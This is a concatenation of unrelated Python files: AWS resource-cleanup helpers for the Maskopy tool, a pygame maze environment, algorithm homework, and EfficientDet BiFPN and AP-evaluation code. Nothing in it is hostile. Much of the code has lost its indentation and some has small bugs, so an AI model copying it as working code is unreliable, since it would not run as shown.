return delete_database_instance(rds_client, db_identifier['DBIdentifier'])
def delete_database_cluster(rds_client, db_identifier):
"""Function to delete RDS instance.
Args:
rds_client (Client): AWS RDS Client object.
        db_identifier (dict): 'DBIdentifier' dict with the DBClusterIdentifier and DBInstanceIdentifier to delete
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
db_cluster_identifier=db_identifier['DBClusterIdentifier']
db_instance_identifier=db_identifier['DBInstanceIdentifier']
    if db_cluster_identifier.lower().startswith('maskopy'):
print(f"Deleting RDS cluster in destination account: {db_cluster_identifier}")
try:
rds_client.delete_db_instance(
DBInstanceIdentifier=db_instance_identifier,
SkipFinalSnapshot=True)
rds_client.delete_db_cluster(
DBClusterIdentifier=db_cluster_identifier,
SkipFinalSnapshot=True)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBClusterNotFound':
print(f'RDS cluster, {db_cluster_identifier}, already deleted.')
return True
# Check if error code is due to RDS not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBClusterState':
print(f"{db_cluster_identifier}: RDS cluster is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting database: {db_cluster_identifier}.")
raise MaskopyThrottlingException(err)
if err.response['Error']['Code'] == 'DBInstanceNotFound':
print(f'RDS instance, {db_instance_identifier}, already deleted.')
return True
# Check if error code is due to RDS not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBInstanceState':
print(f"{db_instance_identifier}: RDS instance is not in available state.")
raise MaskopyResourceException(err)
print(f"Error deleting database cluster, {db_cluster_identifier}: {err.response['Error']['Code']}")
print(err)
return False
def delete_database_instance(rds_client, db_identifier):
"""Function to delete RDS instance.
Args:
rds_client (Client): AWS RDS Client object.
        db_identifier (dict): 'DBIdentifier' dict with the DBInstanceIdentifier to delete
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
db_instance_identifier=db_identifier['DBInstanceIdentifier']
try:
rds_client.delete_db_instance(
DBInstanceIdentifier= db_instance_identifier,
SkipFinalSnapshot=True)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBInstanceNotFound':
print(f'RDS instance, { db_instance_identifier}, already deleted.')
return True
# Check if error code is due to RDS not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBInstanceState':
print(f"{db_instance_identifier}: RDS instance is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting database: { db_instance_identifier }.")
raise MaskopyThrottlingException(err)
print(f"Error deleting database, {db_instance_identifier}: {err.response['Error']['Code']}")
print(err)
return False
def delete_asg(asg_client, asg_name):
"""Function to delete ASG.
Args:
asg_client (Client): AWS ASG Client object.
asg_name (str): ASG and launch configuration name to delete
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
# Check if ASG exists and then delete it
asg_response = asg_client.describe_auto_scaling_groups(
AutoScalingGroupNames=[asg_name])
if asg_response['AutoScalingGroups']:
print(f'Deleting ASG: {asg_name}')
asg_client.delete_auto_scaling_group(
AutoScalingGroupName=asg_name, ForceDelete=True)
time.sleep(40)
# Check if launch configuration exists and then delete it
launch_configuration_response = asg_client.describe_launch_configurations(
LaunchConfigurationNames=[asg_name])
if launch_configuration_response['LaunchConfigurations']:
print(f'Deleting launch configuration: {asg_name}.')
asg_client.delete_launch_configuration(
LaunchConfigurationName=asg_name)
return True
except ClientError as err:
# Check if error code is ResourceContention.
if err.response['Error']['Code'] == 'ResourceContention':
print(f"ASG or launch configuration has a pending update already: {asg_name}.")
raise MaskopyResourceException(err)
# Check if error code is ResourceInUse.
if err.response['Error']['Code'] == 'ResourceInUse':
print(f"Launch configuration is still in use: {asg_name}.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting ASG: {asg_name}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting ASG, {asg_name}: {err.response['Error']['Code']}")
print(err)
return False
def deregister_task_definition(ecs_client, task_definition):
"""Function to deregister task definition.
Args:
ecs_client (Client): AWS ECS Client object.
task_definition (str): Task definition to delete
Returns:
bool: True if task definition was deregistered successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Deregistering task definition: {task_definition}')
ecs_client.deregister_task_definition(
taskDefinition=task_definition)
return True
except ClientError as err:
# Check if error code is ClientException.
if (err.response['Error']['Code'] == 'ClientException' and
err.response['Error']['Message'] ==
'The specified task definition does not exist.'):
print(f'Task definition revision, {task_definition}, does not exist.')
return True
print(f"Error deregistering task definition, {task_definition}: "
f"{err.response['Error']['Code']}")
print(err)
return False
def delete_cluster(ecs_client, cluster_name, instance_identifier=None):
"""Function to delete ECS or fargate cluster.
Args:
ecs_client (Client): AWS ECS Client object.
cluster_name (str): Cluster to delete
instance_identifier (str, optional): Instance identifier to deregister.
Classical ECS clusters require EC2 instance to be registered.
Forcing a deregister of the instance allows the ECS cluster to be
deleted.
Returns:
bool: True if cluster was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
cluster = ecs_client.describe_clusters(
clusters=[cluster_name])
if instance_identifier:
ecs_client.deregister_container_instance(
cluster=cluster_name,
containerInstance=instance_identifier,
force=True)
        print(f'Deleting ECS Cluster: {cluster_name}')
ecs_client.delete_cluster(cluster=cluster_name)
return True
except ClientError as err:
# Check if error code is ClusterNotFoundException.
if err.response['Error']['Code'] == 'ClusterNotFoundException':
print(f'ECS cluster, {cluster_name}, already deleted.')
return True
# Check if error code is ClusterContainsContainerInstancesException.
if err.response['Error']['Code'] == 'ClusterContainsContainerInstancesException':
print(f'ECS cluster, {cluster_name}, still contains instances.')
raise MaskopyResourceException(err)
# Check if error code is ClusterContainsTasksException.
if err.response['Error']['Code'] == 'ClusterContainsTasksException':
print(f'ECS cluster, {cluster_name}, still contains tasks.')
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting ECS cluster: {cluster}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting ECS, {cluster_name}: {err.response['Error']['Code']}")
print(err)
return False
def create_account_session(sts_client, role_arn, request_id):
"""Function to create and assume account role.
Args:
sts_client (Client): AWS STS Client object.
role_arn (str): The arn of the role to assume a session.
request_id (str): UUID for session to uniquely identify session name.
Returns:
:obj:`boto3.session.Session`:
A session of the role to be used.
"""
sts_response = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=request_id
)
return boto3.session.Session(
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken']
)
class MaskopyResourceException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource.
"""
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
``` |
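A minimal driver sketch (not part of the original Lambda): it assumes it runs in the same module as the helpers and exception classes above, and wraps the instance deletion in a simple exponential backoff when AWS throttles. The role ARN, request id, and instance name are placeholders.
```python
import time
import boto3

def delete_instance_with_backoff(rds_client, db_identifier, max_attempts=5):
    """Retry delete_database_instance when AWS throttles the request."""
    for attempt in range(max_attempts):
        try:
            return delete_database_instance(rds_client, db_identifier)
        except MaskopyThrottlingException:
            time.sleep(2 ** (attempt + 1))  # back off 2, 4, 8, ... seconds
    return False

sts_client = boto3.client('sts')
session = create_account_session(
    sts_client, 'arn:aws:iam::123456789012:role/example-cleanup-role', 'example-request-id')
rds_client = session.client('rds')
delete_instance_with_backoff(rds_client, {'DBInstanceIdentifier': 'example-instance'})
```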
{
"source": "Jintao-Huang/course_homework",
"score": 3
} |
#### File: hw0/utils/environment.py
```python
import pygame
from pygame.draw import rect
from numpy.random import RandomState
import numpy as np
class PointType:  # enum
START = -2
END = -1
BG = 0
WALL = 1
VISITED = 2
class Environment:
FPS = 10
    SQUARE_SIZE = 30  # size of each small square; the 600 x 300 screen gives a 20 x 10 grid
    SCREEN_SIZE = 600, 300  # W, H
    #
    START_COLOR = "#379BBB"
    END_COLOR = "#D24B4E"
    BG_COLOR = "#A4F53C"
    WALL_COLOR = "#323929"  # barrier
    VISITED_COLOR = "#F2DB75"  # visited
COLOR_MAP = {
PointType.START: START_COLOR, PointType.END: END_COLOR,
PointType.BG: BG_COLOR, PointType.WALL: WALL_COLOR,
PointType.VISITED: VISITED_COLOR
}
BLACK_COLOR = (0, 0, 0)
RED_COLOR = (255, 0, 0)
def __init__(self, wall_rate: float = 0.2):
square_size = self.SQUARE_SIZE
screen_size = self.SCREEN_SIZE
#
pygame.init()
screen = pygame.display.set_mode(screen_size) # W, H
pygame.display.set_caption("Environment")
fresh_clock = pygame.time.Clock()
#
self.screen = screen
self.fresh_clock = fresh_clock
self.env_matrix = np.zeros((screen_size[1] // square_size, screen_size[0] // square_size),
dtype=np.int32)
self.path = None
#
self.wall_rate = wall_rate
def init_env(self, *, env_matrix=None, random_state: int = None) -> None:
if env_matrix is not None:
self.env_matrix = env_matrix
else:
random_state = random_state if isinstance(random_state, RandomState) \
else RandomState(random_state)
self._init_env_matrix_random(random_state)
def _init_env_matrix_random(self, random_state=None):
wall_rate = self.wall_rate
env_matrix = np.ravel(self.env_matrix) # view
#
idxs = random_state.permutation(env_matrix.size)
start_idxs, end_idxs = idxs[:2]
wall_idxs = idxs[2:int(env_matrix.size * wall_rate) + 2]
        env_matrix[start_idxs] = PointType.START
        env_matrix[end_idxs] = PointType.END
        env_matrix[wall_idxs] = PointType.WALL
def _draw_rect(self, i: int, j: int, square_type: int):
screen = self.screen
square_size = self.SQUARE_SIZE
        # fill the cell
rect(screen, self.COLOR_MAP[square_type],
(square_size * j + 1, square_size * i + 1, square_size - 2, square_size - 2)) # LTWH
def step(self) -> None:
screen_size = self.SCREEN_SIZE
square_size = self.SQUARE_SIZE
fps = self.FPS
fresh_clock = self.fresh_clock
env_matrix = self.env_matrix
path = self.path
#
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
# draw
for i in range(screen_size[1] // square_size):
for j in range(screen_size[0] // square_size):
self._draw_rect(i, j, env_matrix[i, j])
if path:
self._draw_path(path)
#
pygame.display.update()
fresh_clock.tick(fps)
def _draw_path(self, path):
screen = self.screen
red_color = self.RED_COLOR
square_size = self.SQUARE_SIZE
#
path = [(square_size * pos[0] + square_size // 2,
square_size * pos[1] + square_size // 2)
for pos in path]
pygame.draw.lines(screen, red_color, False, path, 2)
```
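A small usage sketch (assumed entry point, not shown in the original file): build the environment, generate a random maze, and keep rendering it.
```python
if __name__ == "__main__":
    env = Environment(wall_rate=0.2)
    env.init_env(random_state=42)  # random start/end/walls
    while True:
        env.step()  # handles pygame events and redraws the grid at Environment.FPS
```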
#### File: suanfa/hw5/ex3.py
```python
from numba import njit
import random
from typing import Callable
@njit
def func(x: float) -> float:
return x ** 2 - 1
def func_integral(x: float) -> float:
return x ** 3 / 3 - x
@njit
def HitorMiss2(f: Callable[[float], float],
a: float, b: float, c: float, d: float,
n: int) -> float:
"""f: [a, b]->[c, d]"""
    k = 0  # hit count
c, d = min(c, 0), max(d, 0)
S = (d - c) * (b - a)
#
for _ in range(n):
x = random.uniform(a, b)
y = random.uniform(c, d)
fx = f(x)
#
        if 0 < y <= fx:  # (x, y) lies in the positive region under the curve
k += 1
if fx <= y < 0:
k -= 1
return k / n * S
a, b, c, d = -1, 3, func(0), func(3)
print("准确解: %f" % (func_integral(b) - func_integral(a)))
#
n = int(1e8)
res = HitorMiss2(func, a, b, c, d, n)
print("n: %d, 计算的积分值: %f" % (n, res))
"""Out
准确解: 5.333333
n: 100000000, 计算的积分值: 5.337512
"""
```
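A quick follow-up sketch (not in the original homework) that repeats the estimator with a smaller sample size to gauge its spread; the repeat count and sample size are arbitrary choices.
```python
import numpy as np

repeats, n_small = 20, 10 ** 6
estimates = np.array([HitorMiss2(func, a, b, c, d, n_small) for _ in range(repeats)])
print("mean: %f, standard deviation: %f" % (estimates.mean(), estimates.std(ddof=1)))
```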
#### File: suanfa/hw5/ex p67.py
```python
import random
from typing import List, Callable, Tuple, Any
import math
import numpy as np
import time
# 创建数据
n = 1000000
x = n // 2
def generate_date(n, seed=None, random=True) -> Tuple[List, List, int]:
"""
:param n:
:param seed:
:param random:
:return: val, ptr, head
"""
np.random.seed(seed)
if random:
val = np.random.permutation(n)
else:
val = np.arange(n)
ptr = np.argsort(val)
head = ptr[0]
ptr[ptr.copy()] = np.r_[ptr[1:], -1]
return list(val), list(ptr), head
val, ptr, head = generate_date(n, 30, False)
def test_time(f: Callable, *args, **kwargs) -> Tuple[float, Any]:
t = time.time()
res = f(*args, **kwargs)
return time.time() - t, res
def Search(x: int, i: int) -> int:
    """Assume x is in the list. Search for x in the sorted linked list starting from position i."""
    while x > val[i]:  # the loop exits on equality
        i = ptr[i]
    return i
def A(x: int, head: int) -> int:
return Search(x, head)
def D(x: int, head: int) -> int:
i = random.randint(0, n - 1)
y = val[i]
if x < y:
return Search(x, head)
elif x > y:
return Search(x, ptr[i])
else:
return i
def search_sqrt_n(x: int, i_list: List[int]) -> int:
    """Assume x is in the list. Among i_list, find the index i whose value y is the largest value
    not greater than x, then continue the sequential search from i."""
    i = 0
    max_ = int(-1e9)
    for j in i_list:
        y = val[j]
        if max_ < y <= x:  # closest to x while still <= x
            i = j
            max_ = y
    return Search(x, i)
def B(x: int) -> int:
    """Use the first sqrt(n) positions as i_list"""
    sqrt_n = int(math.sqrt(n))  # floor
    i_list = list(range(sqrt_n))
    return search_sqrt_n(x, i_list)
def choice(x: List[int], k: int) -> List[int]:
    """Randomly pick k elements from x without replacement (replace=False)"""
    n = len(x)
    for i in range(k):
        idx = random.randint(i, n - 1)  # [i...n-1], inclusive
        x[i], x[idx] = x[idx], x[i]
    return x[:k]
def C(x: int) -> int:
    """Randomly pick sqrt(n) positions as i_list"""
    sqrt_n = int(math.sqrt(n))  # floor
    i_list = choice(list(range(n)), sqrt_n)
    return search_sqrt_n(x, i_list)
ta, res_a = test_time(A, x, head)
td, res_d = test_time(D, x, head)
tb, res_b = test_time(B, x)
tc, res_c = test_time(C, x)
print("查找x: %d, n: %d. (顺序)" % (x, n))
print("A |Time: %.6f |Result: %d" % (ta, val[res_a]))
print("D |Time: %.6f |Result: %d" % (td, val[res_d]))
print("B |Time: %.6f |Result: %d" % (tb, val[res_b]))
print("C |Time: %.6f |Result: %d" % (tc, val[res_c]))
print()
#
val, ptr, head = generate_date(n, 42, True)
ta, res_a = test_time(A, x, head)
td, res_d = test_time(D, x, head)
tb, res_b = test_time(B, x)
tc, res_c = test_time(C, x)
print("查找x: %d, n: %d. (随机)" % (x, n))
print("A |Time: %.6f |Result: %d" % (ta, val[res_a]))
print("D |Time: %.6f |Result: %d" % (td, val[res_d]))
print("B |Time: %.6f |Result: %d" % (tb, val[res_b]))
print("C |Time: %.6f |Result: %d" % (tc, val[res_c]))
"""Out
Search x: 500000, n: 1000000. (sequential order)
A |Time: 0.095720 |Result: 500000
D |Time: 0.054885 |Result: 500000
B |Time: 0.103692 |Result: 500000
C |Time: 0.022937 |Result: 500000
Search x: 500000, n: 1000000. (random order)
A |Time: 0.247916 |Result: 500000
D |Time: 0.250041 |Result: 500000
B |Time: 0.000998 |Result: 500000
C |Time: 0.025151 |Result: 500000
"""
``` |
{
"source": "Jintao-Huang/EfficientDet_PyTorch",
"score": 2
} |
#### File: EfficientDet_PyTorch/models/backbone.py
```python
from .efficientnet import _efficientnet
import torch.nn as nn
from .utils import IntermediateLayerGetter, freeze_layers
from .bifpn import BiFPN
from collections import OrderedDict
efficientnet_out_channels = {
# the out_channels of P3/P4/P5.
"efficientnet_b0": [40, 112, 320],
"efficientnet_b1": [40, 112, 320],
"efficientnet_b2": [48, 120, 352],
"efficientnet_b3": [48, 136, 384],
"efficientnet_b4": [56, 160, 448],
"efficientnet_b5": [64, 176, 512],
"efficientnet_b6": [72, 200, 576],
"efficientnet_b7": [72, 200, 576]
}
class EfficientNetWithBiFPN(nn.Sequential):
def __init__(self, config):
backbone_name = config['backbone_name']
pretrained_backbone = config['pretrained_backbone']
backbone_norm_layer = config["backbone_norm_layer"]
image_size = config['image_size']
backbone_freeze = config['backbone_freeze']
# -------------------------
fpn_norm_layer = config["other_norm_layer"]
fpn_channels = config['fpn_channels']
fpn_num_repeat = config['fpn_num_repeat']
# create modules
backbone = _efficientnet(backbone_name, pretrained_backbone,
norm_layer=backbone_norm_layer, image_size=image_size)
        # freeze layers (check the effect yourself before enabling)
if backbone_freeze:
freeze_layers(backbone, backbone_freeze)
return_layers = {"layer3": "P3", "layer5": "P4", "layer7": "P5"} # "layer2": "P2",
in_channels_list = efficientnet_out_channels[backbone_name] # bifpn
super(EfficientNetWithBiFPN, self).__init__(OrderedDict({
"body": IntermediateLayerGetter(backbone, return_layers),
"bifpn": BiFPN(fpn_num_repeat, in_channels_list, fpn_channels,
attention=True if "b6" not in backbone_name else False, # d6, d7 use b6
norm_layer=fpn_norm_layer)
}))
```
#### File: EfficientDet_PyTorch/models/bifpn.py
```python
import torch
import torch.nn as nn
from .efficientnet import get_same_padding, Swish
import torch.nn.functional as F
from collections import OrderedDict
class Conv2dSamePadding(nn.Conv2d):
"""Conv2dDynamicSamePadding
由于输入大小都是128的倍数,所以动态卷积和静态卷积的结果是一致的。此处用动态卷积代替静态卷积,因为实现方便。
Since the input size is a multiple of 128,
the results of dynamic convolution and static convolution are consistent.
Here, dynamic convolution is used instead of static convolution,
because it is convenient to implement"""
def __init__(self, in_channels, out_channels, kernel_size, stride, groups, bias):
self.kernel_size = kernel_size
self.stride = stride
super(Conv2dSamePadding, self).__init__(
in_channels, out_channels, kernel_size, stride, groups=groups, bias=bias
)
def forward(self, x):
padding = get_same_padding(x.shape[-2:], self.kernel_size, self.stride)
x = F.pad(x, padding)
x = super().forward(x)
return x
class MaxPool2dSamePadding(nn.MaxPool2d):
"""MaxPool2dDynamicSamePadding
由于输入大小都是128的倍数,所以动态池化和静态池化的结果是一致的。此处用动态池化代替静态池化,因为实现方便。
Since the input size is a multiple of 128,
the results of dynamic maxpool and static maxpool are consistent.
Here, dynamic maxpool is used instead of static maxpool,
because it is convenient to implement"""
def __init__(self, kernel_size, stride):
self.kernel_size = kernel_size
self.stride = stride
super(MaxPool2dSamePadding, self).__init__(
kernel_size, stride
)
def forward(self, x):
padding = get_same_padding(x.shape[-2:], self.kernel_size, self.stride)
x = F.pad(x, padding)
x = super().forward(x)
return x
class DepthSeparableConv2d(nn.Sequential):
"""depthwise separable convolution"""
def __init__(self, in_channels, out_channels, kernel_size, stride):
depthwise_conv = Conv2dSamePadding(in_channels, in_channels, kernel_size, stride, in_channels, False)
        pointwise_conv = Conv2dSamePadding(in_channels, in_channels, 1, 1, 1, True)  # bias could be changed to False
super(DepthSeparableConv2d, self).__init__(
OrderedDict({
"depthwise_conv": depthwise_conv,
"pointwise_conv": pointwise_conv
})
)
class BiFPNBlock(nn.Module):
def __init__(self, in_channels_list, fpn_channels, attention, attention_eps, bn_momentum, bn_eps, norm_layer=None):
super(BiFPNBlock, self).__init__()
self.attention = attention
self.attention_eps = attention_eps
norm_layer = norm_layer or nn.BatchNorm2d
# create modules
if isinstance(in_channels_list, (tuple, list)): # first BiFPN block
# generate P6 and P7
self.in_blocks = nn.ModuleDict(OrderedDict({
"to_P3_0": nn.Sequential( # P3
Conv2dSamePadding(in_channels_list[0], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P4_0": nn.Sequential( # P4
Conv2dSamePadding(in_channels_list[1], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P5_0": nn.Sequential( # P5
Conv2dSamePadding(in_channels_list[2], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P6_0": nn.Sequential(
Conv2dSamePadding(in_channels_list[2], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
MaxPool2dSamePadding(3, 2)
),
"to_P7_0": MaxPool2dSamePadding(3, 2),
                # second (skip) outputs of P4 and P5; P4 and P5 each have two outputs
"to_P4_02": nn.Sequential( # P4
Conv2dSamePadding(in_channels_list[1], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P5_02": nn.Sequential( # P5
Conv2dSamePadding(in_channels_list[2], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
                # P6_2 uses the output of P6
}))
conv_block1 = [] # "P6_0_to_P6_1", "P5_0_to_P5_1", "P4_0_to_P4_1", "P3_0_to_P3_2"
conv_block2 = [] # "P4_1_to_P4_2", "P5_1_to_P5_2", "P6_1_to_P6_2", "P7_0_to_P7_2"
upsample_block = [] # "P7_0_to_P6_1", "P6_1_to_P5_1", "P5_1_to_P4_1", "P4_1_to_P3_2"
downsample_block = [] # "P3_2_to_P4_2", "P4_2_to_P5_2", "P5_2_to_P6_2", "P6_2_to_P7_2"
for _ in range(4):
conv_block1.append(nn.Sequential(
DepthSeparableConv2d(fpn_channels, fpn_channels, 3, 1),
norm_layer(fpn_channels, bn_eps, bn_momentum),
))
conv_block2.append(nn.Sequential(
DepthSeparableConv2d(fpn_channels, fpn_channels, 3, 1),
norm_layer(fpn_channels, bn_eps, bn_momentum),
), )
upsample_block.append(nn.UpsamplingNearest2d(scale_factor=2))
downsample_block.append(MaxPool2dSamePadding(3, 2))
self.conv_block1 = nn.ModuleList(conv_block1)
self.conv_block2 = nn.ModuleList(conv_block2)
self.upsample_block = nn.ModuleList(upsample_block)
self.downsample_block = nn.ModuleList(downsample_block)
self.swish = Swish()
# extra weight
if attention:
self.weight_relu = nn.ReLU()
self.to_P6_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P5_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P4_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P3_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P4_2_w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.to_P5_2_w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.to_P6_2_w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.to_P7_2_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
def forward(self, x):
"""
:param x: List/OrderDict(P3, P4, P5)
:return: List(P3_2, P4_2, P5_2, P6_2, P7_2)
"""
if isinstance(x, OrderedDict):
x = list(x.values())
if hasattr(self, 'in_blocks'):
P3, P4, P5 = x
# Generate P6_0, P7_0
P6_0 = self.in_blocks["to_P6_0"](P5)
P7_0 = self.in_blocks["to_P7_0"](P6_0)
# Adjust P3, P4, and P5 dimensions -> P3_0, P4_0, P5_0
in_blocks = list(self.in_blocks.values())[:3]
for i in range(3):
x.append(in_blocks[i](x.pop(0)))
# x: [P3_0, P4_0, P5_0]
# ---------------------
x += [P6_0, P7_0]
del P3, P6_0, P7_0
# x: [P3_0, P4_0, P5_0, P6_0, P7_0]
# --------------------------------
# calculate P6_1, P5_1, P4_1, P3_2
out_1 = []
conv_block1 = self.conv_block1
upsample_block = self.upsample_block
in_1 = list(reversed(x)) # [P6_0, P5_0, P4_0, P3_0]
in_2 = [x[-1]] # [P7_0]
if self.attention:
weights_1 = [self.to_P6_1_w, self.to_P5_1_w, self.to_P4_1_w, self.to_P3_1_w]
for i in range(4):
weight = self.weight_relu(weights_1[i])
weight = weight / (torch.sum(weight, dim=0) + self.attention_eps) # normalize
out_1.append(conv_block1[i](self.swish(weight[0] * in_1[i + 1] +
weight[1] * upsample_block[i](in_2[i]))))
in_2.append(out_1[-1])
del weights_1
else:
for i in range(4):
out_1.append(conv_block1[i](self.swish(in_1[i + 1] + upsample_block[i](in_2[i]))))
in_2.append(out_1[-1])
del in_1, in_2 # Prevent interference with subsequent parameter references
# out_1: [P6_1, P5_1, P4_1, P3_2]
# --------------------------------
# x: [P3_0, P4_0, P5_0, P6_0, P7_0]
# calculate P4_02, P5_02
if hasattr(self, 'in_blocks'):
out = []
inputs = [P4, P5]
in_blocks = list(self.in_blocks.values())[5:]
for i in range(2):
out.append(in_blocks[i](inputs[i]))
out += x[-2:]
x = out
del inputs, P4, P5, out
else:
x = x[1:]
# x: [P4_02, P5_02, P6_0, P7_0]
# --------------------------------
# calculate P4_2, P5_2, P6_2, P7_2
out_2 = []
conv_block2 = self.conv_block2
downsample_block = self.downsample_block
in_1 = x.copy() # [P4_02, P5_02, P6_0, P7_0]
in_2 = list(reversed(out_1))[1:] # [P4_1, P5_1, P6_1]
in_3 = [out_1[-1]] # [P3_2]
if self.attention:
weights_2 = [self.to_P4_2_w, self.to_P5_2_w, self.to_P6_2_w, self.to_P7_2_w]
for i in range(4):
weight = self.weight_relu(weights_2[i])
weight = weight / (torch.sum(weight, dim=0) + self.attention_eps)
if i == 3: # last
out_2.append(conv_block2[i](self.swish(
weight[0] * in_1[i] + weight[1] * downsample_block[i](in_3[i]))))
else:
out_2.append(conv_block2[i](self.swish(
weight[0] * in_1[i] + weight[1] * in_2[i] + weight[2] * downsample_block[i](in_3[i]))))
in_3.append(out_2[-1])
del weights_2
else:
for i in range(4):
if i == 3: # last
out_2.append(conv_block2[i](self.swish(in_1[i] + downsample_block[i](in_3[i]))))
else:
out_2.append(conv_block2[i](self.swish(in_1[i] + in_2[i] + downsample_block[i](in_3[i]))))
in_3.append(out_2[-1])
del in_1, in_2, in_3
# output = [P4_2, P5_2, P6_2, P7_2]
# --------------------------------
out_2.insert(0, out_1[-1])
return out_2 # [P3_2, P4_2, P5_2, P6_2, P7_2]
class BiFPN(nn.Sequential):
def __init__(self, fpn_num_repeat, in_channels_list, fpn_channels, attention, attention_eps=1e-4,
bn_momentum=1e-2, bn_eps=1e-3, norm_layer=None):
norm_layer = norm_layer or nn.BatchNorm2d
layers = []
for i in range(fpn_num_repeat):
layers.append(BiFPNBlock(
in_channels_list if i == 0 else fpn_channels,
fpn_channels, attention, attention_eps, bn_momentum, bn_eps, norm_layer
))
super(BiFPN, self).__init__(*layers)
```
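A shape-check sketch (not part of the repo). It assumes this file is importable as `models.bifpn` and feeds random feature maps whose channels match the `efficientnet_b0` entry in backbone.py on a 512x512 input.
```python
import torch
from models.bifpn import BiFPN  # assumed package layout

feats = [torch.randn(1, 40, 64, 64),    # P3, stride 8
         torch.randn(1, 112, 32, 32),   # P4, stride 16
         torch.randn(1, 320, 16, 16)]   # P5, stride 32
bifpn = BiFPN(fpn_num_repeat=3, in_channels_list=[40, 112, 320], fpn_channels=64, attention=True)
with torch.no_grad():
    outs = bifpn(feats)
for level, out in enumerate(outs, start=3):
    print("P%d_2:" % level, tuple(out.shape))  # 64 channels each, strides 8 to 128
```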
#### File: utils/detection/ap_counter.py
```python
from torchvision.ops.boxes import box_iou
import torch
class APCounter:
def __init__(self, labels, iou_thresh=0.5):
"""
:param labels: List[str]
:param iou_thresh:
"""
self.iou_thresh = iou_thresh
self.labels = labels
        # List[List[tuple(score(float), correct(bool)),...]]. One table per class
        self.pred_table_list = None
        # List[num(int)]. Counted separately for each class
self.target_num_list = None
def init_table(self):
self.pred_table_list = [[] for _ in range(len(self.labels))]
        # List[num(int)]. Counted separately for each class
self.target_num_list = [0 for _ in range(len(self.labels))]
def add(self, pred_list, target_list):
"""
        :param pred_list: List[Dict]. "scores" must already be sorted in descending order
:param target_list: List[Dict]
:return: None
"""
for pred, target in zip(pred_list, target_list):
pred_boxes, pred_labels, pred_scores = pred['boxes'], pred['labels'], pred['scores']
target_boxes, target_labels = target['boxes'], target['labels']
# 1. target_num_list
for target_label in target_labels:
target_label = target_label.item()
self.target_num_list[target_label] += 1
# 2. pred_table_list
            have_detected = torch.zeros(target_labels.shape[0], dtype=torch.bool)  # records targets that have already been matched
for pred_box, pred_label, pred_score in zip(pred_boxes, pred_labels, pred_scores):
pred_label = pred_label.item()
pred_score = pred_score.item()
                # select target_boxes with the same label
matched = torch.nonzero(target_labels == pred_label, as_tuple=True) # (N)
correct = self._is_box_correct(pred_box, target_boxes, matched, have_detected, self.iou_thresh)
self.pred_table_list[pred_label].append((pred_score, correct))
def get_ap_dict(self):
ap_list = [0. for _ in range(len(self.labels))]
for i, (pred_table, target_num) in enumerate(zip(self.pred_table_list, self.target_num_list)):
prec_list, recall_list = self._calc_pr(pred_table, target_num)
ap_list[i] = self._calc_ap(prec_list, recall_list)
ap_dict = {label: ap for label, ap in zip(self.labels, ap_list)}
return ap_dict
@staticmethod
def print_ap(ap_dict):
mean_ap = sum(ap_dict.values()) / len(ap_dict)
print("mAP: %f" % mean_ap)
